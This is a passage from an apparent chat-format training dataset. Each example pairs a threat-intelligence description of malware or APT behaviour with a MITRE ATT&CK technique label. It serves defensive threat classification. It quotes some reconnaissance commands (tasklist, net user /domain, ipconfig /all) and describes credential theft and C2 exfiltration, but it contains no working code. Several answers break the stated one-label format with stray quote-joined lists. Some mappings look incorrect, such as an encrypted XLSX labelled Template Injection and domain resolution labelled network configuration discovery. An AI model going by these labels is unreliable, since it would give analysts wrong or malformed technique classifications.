}, { "role": "user", "content": "ABK has the ability to decrypt AES encrypted payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt has a command to perform a process listing." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has harvested credentials from the victim's machine using Empire." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads" }, { "role": "assistant", "content": "T1583.006 - Web Services', 'T1102 - Web Service', 'T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can alter the victim's proxy configuration." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OLDBAIT obfuscates internal strings and unpacks them at startup." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has created a Registry Run key named \"Dropbox Update Setup\" to establish persistence for a malicious Python binary." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe /c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"File Uploaded\")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"< File Not Found >\")> If the file exists, the Trojan will read the contents of the specified file and compresses the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 gathered a list of running processes on the system using \"tasklist /v\"." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers." }, { "role": "assistant", "content": "T1613 - Container and Resource Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool called CANDYKING to capture a screenshot of user's desktop." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7." }, { "role": "assistant", "content": "T1590.005 - IP Addresses', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027.003 - Steganography', 'T1216 - Signed Script Proxy Execution', 'T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses ports 447 and 8082 for C2 communications." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The wiper could be configured to use a file to overwrite the files on the disk using the ‘F’ configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named ‘GRANT’, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos can exfiltrate credentials over the network via UDP." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PingPull can enumerate storage volumes and folder contents of a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs a root certificate to aid in man-in-the-middle actions." }, { "role": "assistant", "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. Thus the 2FA code was sent with supporting Chinese text" }, { "role": "assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has the ability to base64 encode and XOR encrypt strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects into other processes to load modules." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has used HTTP POST for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used SMS and email messages with links designed to steal credentials." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may collect network configuration data by running ipconfig /all on a victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrossRAT creates a Launch Agent on macOS." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To gain access to victim environments, the threat actor began by targeting handpicked employees using LinkedIn messaging and email, advertising fake jobs to lure recipients into checking into the supposed offers. In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, “Online preview is not available,” then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description" }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker’s ‘builder’ machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack—all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has added persistence via the Registry key \"software\\microsoft\\windows\\currentversion\\run\\microsoft windows html help\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals user files from local hard drives with file extensions that match a predefined list." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey “atiumdag.dll” component, this code collects identifying system information using standard win32 API calls: Computer name – GetComputerNameW User name – GetUserNameW Adapter GUID, ip address, mac address – GetAdaptersInfo Windows version – GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls" }, { "role": "assistant", "content": "T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information', 'T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of providing shell functionality to the attacker to execute commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has run \"net user\", \"net user /domain\", \"net group “domain admins” /domain\", and \"net group “Exchange Trusted Subsystem” /domain\" to get account listings on a victim." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account" }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loaded DLL retrieves the path to the Warzone malicious file from HKCU\\SOFTWARE\\_rptls\\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used a forged \"duo-sid\" cookie to bypass MFA set on an email account." }, { "role": "assistant", "content": "T1550.004 - Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pysa can perform OS credential dumping using Mimikatz." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ccf32 can upload collected data and files to an FTP server." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Our dynamic analysis showed Lokibot’s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term “proforma. The malicious attachment was a DOCX, with a file name that also included “proforma” in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We then conducted a static analysis to examine Lokibot’s techniques and targets. It starts from the tenth byte in the data section of the initial TCP POST request. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. The binary’s hardcoded strings provided data about the binary’s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. Figure 9Hollow Process; Manually Unpacking the First Stage BinaryWe tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet creates a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The delivery document uses the XLSX extension typically used by OpenXML documents, but the file itself is actually an OLE (XLS) document. The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito uses COM hijacking as a method of persistence." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers." }, { "role": "assistant", "content": "T1585.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used compromised credentials to access other systems on a victim network." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can create a scheduled task to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures hashes and credentials that are sent to the system after the name services have been poisoned." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has a tool that looks for files and directories on the local file system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.\\u200E” function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file \"Java(TM) Platform SE Auto Updater.lnk\" in the \"Startup\" special folder pointing to the main backdoor JavaScript" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": 